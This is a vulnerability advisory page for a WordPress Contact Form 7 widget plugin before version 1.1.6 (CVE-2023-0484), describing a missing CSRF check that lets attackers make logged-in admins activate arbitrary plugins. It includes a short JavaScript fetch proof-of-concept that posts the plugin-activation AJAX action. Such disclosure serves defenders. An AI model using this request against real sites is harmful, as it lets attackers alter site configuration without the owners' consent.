Lucene search
Lana CodesWPEX-ID:E61FB245-0D7F-42B0-9B96-C17ADE8C04C5HistoryFeb 28, 2023 - 12:00 a.m.
Contact Form 7 Widget For Elementor Page Builder & Gutenberg Blocks < 1.1.6 - Arbitrary Plugin Activation via CSRF
2023-02-2800:00:00
Lana Codes
66
contact form 7
elementor page builder
gutenberg blocks
plugin activation
exploit
csrf
woocommerce
EPSS
0.001
Percentile
32.8%
The plugin does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack
activate woocommerce plugin exploit:
fetch('http://localhost/wp-admin/admin-ajax.php', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'action=ht-contactform_ajax_plugin_activation&location=woocommerce/woocommerce.php',
redirect: 'follow'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));Related
cvelist
cvelist
wpvulndb
wpvulndb
prion
prion
Cross site request forgery (csrf)
2023-03-27 16:15:00
cve
cve
CVE-2023-0484
2023-03-27 16:15:08
nvd
nvd
CVE-2023-0484
2023-03-27 16:15:08
wordfence
wordfence